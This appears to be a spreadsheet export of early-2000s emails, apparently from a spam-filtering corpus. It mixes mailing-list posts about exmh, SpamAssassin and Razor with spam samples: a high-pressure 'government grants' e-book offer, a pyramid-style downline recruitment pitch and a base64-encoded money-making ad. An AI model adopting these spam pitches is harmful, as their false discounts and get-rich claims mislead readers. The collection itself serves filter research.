 small business activity you can think of.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;The
 Guide presented here contains every tip, trick, technique and strategy
 I've learned during my 23 year career. You practically get my whole brain
 in a form of an E-book.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;How the Grants Guide is priced?&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;&lt;b&gt;The Complete Guide To
 Government Grants&lt;/b&gt; is normally priced at $50, but...&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;... as part of an Online
 marketing test, if you purchase from this sale you pay only $19.99 (that's
 75% off ...plus, you still get the FREE valuable bonuses.)&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;If
 you are serious about obtaining free grants money, you &lt;u&gt;need&lt;/u&gt; this
 guide. Don't delay a moment longer. Order Now !!!&amp;nbsp;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;font face="Verdana"&gt;&lt;font size=-1&gt;&lt;b&gt;P.S.&lt;/b&gt; The Complete Guide To Government
 Grants will make a huge difference. You risk nothing. The guide is not
 the original price of $50, but only $19.99 (&lt;u&gt;if you purchase through
 this sale &lt;/u&gt;) and comes with a one year money back guarantee. And you
 get four valuable free bonuses which you may keep regardless. Don't delay
 a moment longer, ORDER NOW !!!!&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;&amp;nbsp;
 &lt;p STYLE="margin-bottom: 0cm"&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Shipping
 and Handling is &lt;b&gt;&lt;font color="#CC0000"&gt;FREE&lt;/font&gt;&lt;/b&gt; since we will
 email you all of this info via access to our secure website which contains
 everything described above.&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;
 &lt;hr&gt;
 &lt;center&gt;
 &lt;p&gt;&amp;nbsp;&lt;font color="#FF0000"&gt;&lt;font size=+4&gt;&lt;a href="http://www.2003marketing.com/grants.htm"&gt;Order
 Now!!!&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/center&gt;
 If above link doesn't work, &lt;a href="http://2003marketing.com/grants.htm"&gt;Click Here
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;p&gt;&lt;a NAME="ebayphotohosting"&gt;&lt;/a&gt;&lt;a NAME="ebaylargephotohosting"&gt;&lt;/a&gt;
 &lt;br&gt;&amp;nbsp;
 &lt;/body&gt;
 &lt;/html&gt;
 5644bpjd2-377pFPY5008CNGO0-002OUsM8515zVfL7-701GWKM2954NYPO7-265Cugn9200l68
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_31684_01C23F86.7490CF10
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 We attempted to deliver this message to you with HTML formatting. =
 However, your e-mail program does not support HTML-enhanced messages. =
 Please go to your E-mail Settings for this group and change your E-mail =
 Preference to "Text only".
 http://groups.msn.com/OneIncomeLiving/_emailsettings.msnw
 MSN Groups
 ------=_NextPart_000_31684_01C23F86.7490CF10
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
   &lt;HTML&gt;
 &lt;HEAD&gt;
   &lt;META http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgcolor=3D#FFFFFF leftmargin=3D"0" rightmargin=3D"0" =
 bottommargin=3D"0" topmargin=3D"0"&gt;&lt;BASEFONT face=3D"Arial, Helvetica, =
 Sans Serif" size=3D2&gt;
 &lt;STYLE type=3Dtext/css&gt;
 /* Foreground colors */
 .ThmFgColumnHeader, A.FrameLink, A.HeaderLink, A.FooterLink, A.LgtCmd, =
 A.MSNLink {color:#FFFFFF;}
 .ThmFgTitleLightBk {color:#FF6600;}
 .ThmFgNavLink, A.NavLink, A.ChildLink:hover {color:#666699;}
 .ThmFgInactiveText, A.SystemLink {color: #666666;}
 .ThmFgFrameTitle {color: #FFFFCC;}
 .ThmFgTitleDarkBk, A.NavLink:hover, A.TitleLink {color: #CC6600;}
 .ThmFgMiscText, A.Cat, A.SubCat {color: #336699;}
 .ThmFgCommand, A.Command, A.LargeCommand, A.MsgLink {color: #003366;}
 .ThmFgHeader {color: #333333;}
 .ThmFgStandard, A.SystemLink:hover, A.SubLink, A.ChildLink, A.StdLink, =
 SELECT.Standard {color: #000000;}
 .ThmFgDivider {color: #CCCCCC;} /* primarily for HR tags */
 /* Background colors */
 .ThmBgStandard {background-color: #FFFFFF;}
 .ThmBgUnknown1 {background-color: #FF6600;}
 .ThmBgFraming {background-color: #666699;}
 .ThmBgUnknown2 {background-color: #666666;}
 .ThmBgHighlightDark {background-color: #FFFFCC;}
 .ThmBgHighlightLight, #idToolbar {background-color: #FFFFE8;}
 .ThmBgTitleDarkBk {background-color: #F1F1F1;}
 .ThmBgAlternate {background-color: #ECF1F6;}
 .ThmBgUnknown3 {background-color: #CCCCFF;}
 .ThmBgDivider {background-color: #CCCCCC;}
 .ThmBgHeader {background-color: #9999CC;}
 .ThmBgLinks {background-color: #8696C9;}
 .ThmBgSharkBar {background-color: #8696C9;}
 &lt;/STYLE&gt;
 &lt;IMG border=3D0 width=3D1 height=3D1 =
 src=3D"http://c.msn.com/c.gif?NC=3D9523&amp;NA=3D34131&amp;PS=3D&amp;PI=3D26283&amp;DI=3D=
 416&amp;TP=3Dhttp://groups.msn.com"&gt;&lt;TABLE border=3D0 cellpadding=3D0 =
 cellspacing=3D0 width=3D"100%" class=3DThmBgAlternate&gt;
   &lt;TR valign=3D"middle"&gt;
     &lt;TD&gt;&lt;IMG align=3D"middle" border=3D"0" =
 src=3D"http://sc.communities.msn.com/themes/pby/img/mail/mlstar.gif"&gt;&lt;/TD=
 &gt;
     &lt;TD width=3D100%&gt;&lt;FONT face=3DArial, Helvetica, Sans Serif =
 class=3DThmFgTitleLightBk size=3D"4"&gt;New Message on &lt;A =
 href=3D"http://groups.msn.com/OneIncomeLiving"&gt;One Income =
 Living&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;
   &lt;/TR&gt;
   &lt;TR class=3DThmBgDivider&gt;&lt;TD colspan=3D2 width=3D"100%" height=3D"1" =
 colspan=3D"2"&gt;&lt;IMG border=3D"0" =
 src=3D"http://sc.communities.msn.com/img/c.gif" width=3D"100%" =
 height=3D"1"&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;BR&gt;
 &lt;BLOCKQUOTE&gt;
       &lt;A =
 href=3D"http://groups.msn.com/OneIncomeLiving/_notifications.msnw?type=3D=
 msg&amp;action=3Dshowdiscussion&amp;parent=3D1&amp;item=3D1396"&gt;&lt;B&gt;&lt;FONT =
 face=3D"Arial, Helvetica, Sans Serif" class=3DThmFgTitleLightBk =
 size=3D"2"&gt;Hi! I&amp;#39;m new here.&lt;/FONT&gt;&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;
     &lt;BR&gt;=09
     &lt;TABLE class=3DThmBgAlternate border=3D1 cellspacing=3D0 =
 cellpadding=3D2&gt;
       &lt;TR class=3DThmBgAlternate&gt;&lt;TD align=3Dcenter =
 background=3D"http://sc.communities.msn.com/themes/pby/img/mb/reply_bg.gi=
 f" nowrap&gt;&lt;A =
 href=3D"mailto:OneIncomeLiving@groups.msn.com?subject=3DRe%3A%20Hi%21%20I=
 %27m%20new%20here%2E" title=3D"Send a reply to this message."&gt;&lt;FONT =
 face=3D"Verdana,Arial,Helvetica,Sans Serif" class=3DThmFgCommand =
 size=3D"1"&gt;&lt;B&gt;Reply&lt;/B&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;BR&gt;&lt;IMG border=3D0 width=3D80 =
 height=3D1 src=3D"http://sc.communities.msn.com/img/c.gif"&gt;&lt;/TD&gt;&lt;TD =
 width=3D100%&gt;
           &lt;TABLE border=3D0 cellpadding=3D0 cellspacing=3D0&gt;
             &lt;TR&gt;
                &lt;TD&gt;&amp;nbsp;&lt;/TD&gt;
                &lt;TD align=3Dleft width=3D100%&gt;&lt;FONT size=3D"1"&gt;
 		          &lt;A =
 href=3D"mailto:abcusa88@hotmail.com?subject=3DRe%3A%20Hi%21%20I%27m%20new=
 %20here%2E" title=3D"Send a reply to the sender of this message."&gt;&lt;FONT =
 face=3D"Verdana,Arial,Helvetica,Sans Serif" class=3DThmFgCommand =
 size=3D"1"&gt;&lt;B&gt;Reply to Sender&lt;/B&gt;&lt;/FONT&gt;&lt;/A&gt;
 		          &amp;nbsp;&amp;nbsp;&lt;/FONT&gt;&lt;A =
 href=3D"http://groups.msn.com/OneIncomeLiving/_notifications.msnw?type=3D=
 msg&amp;action=3Drecommend&amp;parent=3D1&amp;item=3D1399" title=3D"Increase the =
 number of recommendations for this message."&gt;&lt;IMG align=3Dmiddle =
 border=3D0 height=3D16 hspace=3D3 width=3D16 =
 src=3Dhttp://sc.communities.msn.com/themes/pby/img/mb/recommend.gif&gt;&lt;FONT=
  face=3D"Verdana,Arial,Helvetica,Sans Serif" class=3DThmFgCommand =
 size=3D"1"&gt;&lt;B&gt;Recommend&lt;/B&gt;&lt;/FONT&gt;&lt;/A&gt;
 			      &lt;/TD&gt;
                   &lt;TD align=3Dright nowrap&gt;&lt;FONT size=3D"1"&gt;Message 3 in =
 Discussion&lt;/FONT&gt;
                &lt;/TD&gt;                                =20
 		    &lt;/TR&gt;
 		  &lt;/TABLE&gt;
         &lt;/TD&gt;
       &lt;/TR&gt;&lt;TR&gt;        	   =20
         &lt;TD colspan=3D2&gt;&lt;TABLE border=3D0 cellpadding=3D4 =
 cellspacing=3D0 width=3D100%&gt;
 		    &lt;TR&gt;&lt;TD class=3DThmBgHighlightLight&gt;
 		      &lt;FONT face=3D"Arial, Helvetica, Sans Serif" =
 class=3DThmFgInactiveText size=3D"2"&gt;From: &lt;/FONT&gt;
 			  &lt;A =
 href=3D"http://groups.msn.com/OneIncomeLiving/profile?user=3Djoyful" =
 title=3D"View Member Information of sender."&gt;&lt;FONT face=3D"Arial, =
 Helvetica, Sans Serif" class=3DThmFgMiscText =
 size=3D"2"&gt;joyful&lt;/FONT&gt;&lt;/A&gt;
 			&lt;/TD&gt;&lt;/TR&gt;
 			&lt;TR&gt;&lt;TD class=3DThmBgStandard&gt;
 			  &lt;BR&gt;
               &lt;DIV&gt;We bought a used SUV through a car dealer. They offer =
 an extended warrenty for additional 50,000 miles or 3 years for about =
 $2,500. I checked online quotes for auto extended warrenties and chose =
 one&amp;nbsp;that offers 72,000 additional miles or 6 years, only cost us =
 $1195. &lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;
 		  &lt;/TABLE&gt;
 		&lt;/TD&gt;
       &lt;/TR&gt;
           &lt;/TABLE&gt;
   &lt;BR&gt;
     &lt;A href=3D"http://groups.msn.com/Browse?CatId=3D134"&gt;View other =
 groups in this category.&lt;/A&gt;
   &lt;BR&gt;
   &lt;BR&gt;
       &lt;!--WSSTRIPPABLEBEGIN--&gt;
     &lt;a =
 href=3D"http://g.msn.com/0ADW/136212.1??UIT=3D&amp;amp;TargetID=3D31706&amp;amp;C=
 txID=3D2&amp;amp;PID=3D308649&amp;amp;AN=3D14962" target=3D"_top"&gt;&lt;img =
 src=3D"http://global.msads.net/ads/WBCMON/002111790010_LG.gif" =
 alt=3D"Click Here!" height=3D"60" width=3D"468" border=3D"0" &gt;&lt;/a&gt;    =
 &lt;!--WSSTRIPPABLEEND--&gt;
 &lt;!--WSSTRIPPABLEBEGIN--&gt;&lt;P&gt;&lt;STYLE&gt;&lt;!--
 ADMSmLnk{font-family:verdana,system;color:#336699;text-decoration:none;}
 ADMSmLnk:hover{color:#ff6600;text-decoration:underline;}
 --&gt;&lt;/STYLE&gt;
 &lt;TABLE cellSpacing=3D0 cellPadding=3D0 width=3D500 border=3D0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD&gt;&lt;FONT face=3Dverdana color=3D#333366 size=3D1&gt;&lt;B&gt;Also on =
 MSN:&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;A class=3DADMSmLnk =
 href=3D"http://g.msn.com/2GRENUS/2_8085_01"&gt;&lt;FONT face=3Dverdana =
 color=3D#336699 size=3D1&gt;Start Chatting&lt;/FONT&gt;&lt;/A&gt;&amp;nbsp;&lt;FONT =
 face=3Dverdana color=3D#333366 size=3D1&gt;|&lt;/FONT&gt;&amp;nbsp;&lt;A =
 class=3DADMSmLnk href=3D"http://g.msn.com/2GRENUS/2_8085_02"&gt;&lt;FONT =
 face=3Dverdana color=3D#336699 size=3D1&gt;Listen to Music&lt;/FONT&gt;&lt;/A&gt;&lt;FONT =
 face=3Dverdana color=3D#336699 size=3D1&gt;&lt;/FONT&gt;&amp;nbsp;&lt;FONT =
 face=3Dverdana color=3D#333366 size=3D1&gt;|&lt;/FONT&gt;&amp;nbsp;&lt;A =
 class=3DADMSmLnk href=3D"http://g.msn.com/2GRENUS/2_8085_03"&gt;&lt;FONT =
 face=3Dverdana color=3D#336699 size=3D1&gt;House &amp;amp; Home&lt;/FONT&gt;&lt;/A&gt;&lt;FONT =
 face=3Dverdana color=3D#336699 size=3D1&gt;&lt;/FONT&gt;&amp;nbsp;&lt;FONT =
 face=3Dverdana color=3D#333366 size=3D1&gt;|&lt;/FONT&gt;&amp;nbsp;&lt;A =
 class=3DADMSmLnk href=3D"http://g.msn.com/2GRENUS/2_8085_04"&gt;&lt;FONT =
 face=3Dverdana color=3D#336699 size=3D1&gt;Try Online =
 Dating&lt;/FONT&gt;&lt;/A&gt;&lt;FONT face=3Dverdana color=3D#336699 =
 size=3D1&gt;&lt;/FONT&gt;&amp;nbsp;&lt;FONT face=3Dverdana color=3D#333366 =
 size=3D1&gt;|&lt;/FONT&gt;&amp;nbsp;&lt;A class=3DADMSmLnk =
 href=3D"http://g.msn.com/2GRENUS/2_8085_05"&gt;&lt;FONT face=3Dverdana =
 color=3D#336699 size=3D1&gt;Daily Horoscopes&lt;/FONT&gt;&lt;/A&gt;&lt;FONT face=3Dverdana =
 color=3D#336699 size=3D1&gt;&lt;/FONT&gt;=20
 &lt;TD&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/P&gt;&lt;!--WSSTRIPPABLEEND--&gt;&lt;/BLOCKQUOTE&gt;
 &lt;!--WSSTRIPPABLEBEGIN--&gt;
 &lt;TABLE border=3D0 cellpadding=3D0 cellspacing=3D0 width=3D"100%"&gt;
   &lt;TR class=3DThmBgDivider&gt;&lt;TD width=3D"100%" height=3D"1""&gt;&lt;img =
 border=3D"0" src=3D"http://sc.communities.msn.com/img/c.gif" =
 width=3D"100%" height=3D"1"&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD width=3D"100%" class=3DThmBgAlternate&gt;
       &lt;BLOCKQUOTE&gt;
       &lt;FONT face=3D"Arial, Helvetica, Sans Serif" class=3DThmFgStandard =
 size=3D"1"&gt;
         &lt;BR&gt;
                   To stop getting this e-mail, or change how often it =
 arrives, go to your &lt;A =
 href=3D"http://groups.msn.com/OneIncomeLiving/_emailsettings.msnw"&gt;&lt;FONT =
 class=3DThmFgMiscText&gt;E-mail Settings&lt;/FONT&gt;&lt;/A&gt;.          &lt;BR&gt;&lt;BR&gt;
 		                  Need help? If you've forgotten your password, please =
 go to &lt;A =
 href=3D"http://groups.msn.com/_passportredir.msnw?ppmprop=3Dhelp"&gt;&lt;FONT =
 class=3DThmFgMiscText&gt;Passport Member Services&lt;/FONT&gt;&lt;/A&gt;.          &lt;BR&gt;
 		                  For other questions or feedback, go to our &lt;A =
 href=3D"http://groups.msn.com/contact"&gt;&lt;FONT =
 class=3DThmFgMiscText&gt;Contact Us&lt;/FONT&gt;&lt;/A&gt; page.          &lt;BR&gt;&lt;BR&gt;
 		                  If you do not want to receive future e-mail from =
 this MSN group, or if you received this message by mistake, please click =
 the "Remove" link below. On the pre-addressed e-mail message that opens, =
 simply click "Send". Your e-mail address will be deleted from this =
 group's mailing list.
           &lt;BR&gt;
             &lt;A href=3D"mailto:OneIncomeLiving-remove@groups.msn.com" =
 title=3D"Send a request to have your e-mail removed from this =
 group."&gt;&lt;FONT class=3DThmFgMiscText&gt;Remove my e-mail address from One =
 Income Living.&lt;/FONT&gt;&lt;/A&gt;
 		      &lt;/BLOCKQUOTE&gt;
     &lt;/TD&gt;
   &lt;/TD&gt;
 &lt;/TABLE&gt;
 &lt;!--WSSTRIPPABLEEND--&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 ------=_NextPart_000_31684_01C23F86.7490CF10--
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;     J&gt; For anyone to fully bury global warming, they would need to
 &gt;     J&gt; explain why the dramatic increase in CO2 concentrations are not
 &gt;     J&gt; increasing the global temperature.
 You have not explained why the increase in CO2 concentrations is not
 contributing to increasing global temperature.
 &gt; This too was not news to the theoreticians: All
 &gt; that has happened is that NASA has confirmed the naiive convection
 &gt; concerns.
 Precisely which theoreticians do you mean? What, exactly, do you mean by a
 global warming theoretician -- scientists in this area don't use that term.
 I assure you that not all scientists performing modeling of global
 temperature phenomena agree with your assertions.
 - Jim
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAdev] testing with less rules
</t>
  </si>
  <si>
    <t xml:space="preserve">Justin Mason &lt;jm@jmason.org&gt; writes:
 &gt; hmm. also I think I've found some cases where it's hitting on fetchmail
 &gt; Received hdrs.  that's bad.  so it could be fixed....
 fetchmail adds Received headers?  That seems wrong.  I'll open a bug
 to investigate.  Can you attach some examples?
 &gt; yeah, will do -- somehow.  pity the bugzilla doesn't allow email
 &gt; submissions...
 Agreed.  At least you can add information with email.
 - Dan
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_-1977488590P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Anders Eriksson &lt;aeriksson@fastmail.fm&gt;
 &gt; Date:  Tue, 27 Aug 2002 00:34:43 +0200
 &gt;
 &gt; Just one more info. I measured the time spent wrapping the stuff in 
 &gt; Ftoc_Next with time {} so the data is for real. One difference 
 &gt; between mine and Valdis' setup (judging from his trace) is that I use 
 &gt; the address book. I've been doing that for ages so that can't be the 
 &gt; problem.
 Assuming it's my fault (which it probably is since nobody else has really been 
 in there), it's most likely related to the number of sequences in a folder.  
 I'd guess that something is either being called that shouldn't be or is being 
 called more times than it should be.
 &gt; Is there a way to get the log to print time with higher granularity?
 Not that I'm aware of.  If you look in the code, there are various places 
 where the time function is called in order to see how long it took to do 
 things.  You'll probably want to borrow that technique.
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_-1977488590P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9aq9vK9b4h5R0IUIRAkZrAJ4uCzn3j+5JlaqhDeEOVBMZlSATqwCdGO8z
 gy5px3yMpRraa8JkwHRwmM0=
 =fGBe
 -----END PGP SIGNATURE-----
 --==_Exmh_-1977488590P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">We guarantee you signups before you ever pay
 a penny!  We will show you the green before you
 ever take out your wallet.  Sign up for FREE and 
 test drive our system.  No Obligation whatsoever.  
 No Time Limit on the test drive. Our system is so 
 powerful that the system enrolled over 400 people 
 into my downline the first week.
 To get signed up for FREE and take a test drive use the link:
 mailto:workinathome@btamail.net.cn?subject=more_MOSS3_info_please
 Be sure to request info if the subject line does not! 
 The national attention drawn by this program 
 will drive this program with incredible momentum! 
 Don't wait, if you wait, the next 400 people will 
 be above you.
 Take your FREE test drive and have the next 400  
 below you!
 mailto:workinathome@btamail.net.cn?subject=more_MOSS3_info_please
 Be sure to request info if the subject line does not! 
 All the best,
 Daniel
 Financially Independent Home Business Owner
 ______________________________________________________
 To be excluded from future notices:
 mailto:guaranteed4u@btamail.net.cn?subject=exclude  
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; On Mon, 9 Sep 2002, Rick Baartman wrote:
 &gt; &gt; Is there a way to do a global Sort command?
 &gt; 
 &gt; 
 &gt; Wanting to sort like that is not common; I'd be surprised if exmh has
 &gt; a widget for it.  You can achieve what you want with the command-line
 &gt; mh tools, though.
 &gt; I suggest doing the following from a shell prompt:
 &gt; 
 &gt;  sh -c 'for f in "`folders -recurse -fast`" ; do sortm +"$f" ; done'
 &gt; 
 &gt; (The command "sortm" will sort a particular folder, and
 &gt; "folders -recurse -fast" prints out a list of all of your folders.)
 &gt; 
 &gt; 
 Thanks Tom and Jacob. The above works, but without the double quotes: i.e. 
 sh -c 'for f in `folders -recurse -fast` ; do sortm +"$f" ; done'
 I'd attach this command to the sorting menu if I knew any tcl...
 --
 rick
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: It's probably illegal to set the background color, too.
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Forwarded-by: Nev Dull &lt;nev@sleepycat.com&gt;
 Forwarded-by: Adam Shand &lt;adam@personaltelco.net&gt;
 From: politech@politechbot.com
 Date: Thu, 15 Aug 2002 00:12:27 -0400
 To: declan@well.com
 From: Doug Isenberg &lt;disenberg@gigalaw.com&gt;
 Subject: Pop-up ads and the law
 Declan:
 As you know, a district court judge recently entered a preliminary 
 injunction against Gator in a lawsuit brought by numerous website news 
 publishers over Gator's pop-up advertising service.  In my most recent 
 column for The Wall Street Journal Online (now available on GigaLaw.com
 at http://www.gigalaw.com/articles/2002/isenberg-2002-08.html), I
 examine the potential greater effect of this lawsuit.  For example:
 "Terence Ross of Gibson, Dunn &amp; Crutcher, the news publishers' attorney,
 even told me that he thinks Internet users who configure their browsers
 to disable graphics (a common tactic to boost the speed of Web surfing)
 are committing copyright infringement because they are interfering with
 Web publishers' exclusive right to control how their pages are
 displayed."
 Doug Isenberg, Esq.
 Author, "The GigaLaw Guide to Internet Law" (Random House, October 2002): 
 http://www.GigaLaw.com/guide
 FREE daily Internet law news via e-mail!  Subscribe today: 
 http://www.GigaLaw.com/news
 -------------------------------------------------------------------------
 POLITECH -- Declan McCullagh's politics and technology mailing list
 You may redistribute this message freely if you include this notice.
 To subscribe to Politech: http://www.politechbot.com/info/subscribe.html
 This message is archived at http://www.politechbot.com/
 Declan McCullagh's photographs are at http://www.mccullagh.org/
 -------------------------------------------------------------------------
</t>
  </si>
  <si>
    <t xml:space="preserve">At 5:22 PM -0400 on 9/23/02, Tom wrote:
 &gt; --]&gt; A Green once said that if the Spotted Owl hadn't existed they
 &gt; --]&gt; would have had to invent it.
 &gt; --]A Republican once said "I am not a crook".
 &gt; --]
 &gt;
 &gt; Oh great, another round of Lableisms....Let me know when you get back to
 &gt; real data..
 Not me. I have another one, instead:
          Green = Red.
 ;-).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</si>
  <si>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[Razor-users] report and revoke the same message
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
 Hash: SHA1
 I send mail detected by Razor as spam to the spamtrap, which again reports it 
 as spam. Before I added the procmail rule to revoke (as my real life account) 
 Bugtraq messages that were flagged as spam, I manually revoked them as the 
 spamtrap (which keeps the last 32 messages sent to it). Thus the spamtrap 
 both reported as spam and revoked the same message. What happens to its trust 
 rating?
 Btw, what does "TeS" stand for?
 cmeclax
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.7 (GNU/Linux)
 iD8DBQE9U0iD3/k1hdmG9jMRArnxAKCpw8ZpBWFo3+h7Y2mscN4WER6HEwCfauH9
 54LgdFZN2QQONm7awjHKN1c=
 =yKwF
 -----END PGP SIGNATURE-----
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Got Cash? If Not You Will! 7909AENW6-308hrpj0402jbd-23
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00B5_88C04C4C.B3167C81
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 UHJvdmVuIDYgWWVhciBPbGQgQmV0dGVyIEJ1c2luZXNzIFJlZ2lzdGVyZWQg
 Q29tcGFueSBQcm92aWRlcw0KQSBSZWFsIEFuZCBMZWdpdGltYXRlICBPcHBv
 cnR1bml0eSBUbyBNYWtlIFNvbWUgU0VSSU9VUyBNT05FWSENCg0KTm8gU2Vs
 bGluZyENCk5vIFBob25lIENhbGxzIQ0KTm8gUmVjcnVpdGluZyENCk5vIE1l
 ZXRpbmdzIFRvIEF0dGVuZCENCg0KV2UgRG8gRXh0ZW5zaXZlIEFkdmVydGlz
 aW5nLiAgV2UgRXhwZWN0IFRvIGhlbHAgQnVpbGQgWW91ciBCdXNpbmVzcyBX
 aXRoIA0KVGhlIEFkdmVydGlzaW5nIFByb2dyYW1zIFdlIEhhdmUgRGV2ZWxv
 cGVkIQ0KDQpOTyBFWFBFUklFTkNFIFJFUVVJUkVELi4uDQoNCkFMTCBZT1Ug
 TkVFRCBUTyBETyBJUyBFTlJPTEwuLi4NCg0KQU5ZT05FIENBTiBETyBUSElT
 IQ0KDQpDaGVjayBPdXQ6IGh0dHA6Ly93d3cud29ybGRiaXpzZXJ2aWNlcy5u
 ZXQvbWFnaWMNCg0KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
 LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
 LS0tLS0tLS0tLS0tLS0tLS0tLS0tDQoNCiJZb3UgYXJlIHJlY2VpdmluZyB0
 aGlzIGUtbWFpbCBiZWNhdXNlIHlvdSBoYXZlIHB1cmNoYXNlZCBzb21ldGhp
 bmcgb25saW5lDQpvciBzaWduZWQgdXAgZm9yIGluZm9ybWF0aW9uIG92ZXIg
 dGhlIGxhc3QgNiBtb250aHMuICBJZiB5b3Ugd291bGQgbGlrZSB0byBiZQ0K
 cmVtb3ZlZCBmcm9tIHRoaXMgbGlzdCBzZW5kIGFuIGUtbWFpbCB0byBtZHcx
 MjRAanVuby5jb20uICBQbGVhc2UgcHV0IA0KcmVtb3ZlIGluIHN1YmplY3Qg
 bGluZS4iDQo4NzQ1ZnNtczAtMjI0bDEy
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, Sep 11, 2002 at 01:46:19PM -0700, David Raistrick wrote:
 &gt; On Wed, 11 Sep 2002, Stephane Lentz wrote:
 &gt; 
 &gt; &gt; =&gt; I faced a similar problem with the FreeBSD when trying to 
 &gt; &gt; install SpamAssassin through the ports on my fresh FreeBSD 4.6.2. 
 &gt; &gt; I had to define PERL5LIB with some given order of directories
 &gt; &gt; so that the latest File::Spec module get used. 
 &gt; 
 &gt; Good to hear it's not just me.  Mind telling me how you set PERL5LIB
 &gt; specificly? I've tried a few things (setenv in the shell, as well as
 &gt; $PERL5LIB == ...inside the Makefile.PL, even on the perl command
 &gt; line..) with no success.
 &gt; 
 - Presuming your run Bash  :
 Note the directory lists 
 #  perl -e 'map { print "$_\n" } @INC'
 Then set up the Shell variable PERL5LIB variable (and put it in some .bashrc 
 for future use)
 # export PERL5LIB="directory1:directory2:directory3:directory4"
 Then try to install the software
 PERL5LIB is explained perlrun(1) : do 
 # man perlrun for more information
 Regards, 
 SL/
 ---
 Stephane Lentz / Alcanet International - Internet Services
 -------------------------------------------------------
 In remembrance
 www.osdn.com/911/
 _______________________________________________
 Spamassassin-talk mailing list
 Spamassassin-talk@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --bg08WKrSYDhXBjb5
 Content-Type: text/plain; charset=us-ascii
 Content-Disposition: inline
 Content-Transfer-Encoding: quoted-printable
 On Wed, Feb 06, 2002 at 04:29:53PM +0200, Peter Peltonen wrote:
 &gt; Two issues:
 &gt;=20
 &gt; --&lt;snip&gt;--
 &gt; Sorry, but the following packages have unmet dependencies:
 &gt;   openssh: Depends: openssl (=3D 0.9.5a) but 0.9.6b-8 is installed
 &gt;   php-pgsql: Depends: postgresql but it is not installed
 &gt;              Depends: libpq.so.2
 &gt; E: Unmet dependencies. Try using -f.
 &gt; --&lt;/snip&gt;--
 &gt;=20
 &gt; 1. I have the following openssl packages installed:
 &gt;=20
 &gt; --&lt;snip&gt;--
 &gt; openssl-perl-0.9.6b-8
 &gt; openssl-0.9.6b-8
 &gt; openssl095a-0.9.5a-11
 &gt; openssl-devel-0.9.6b-8
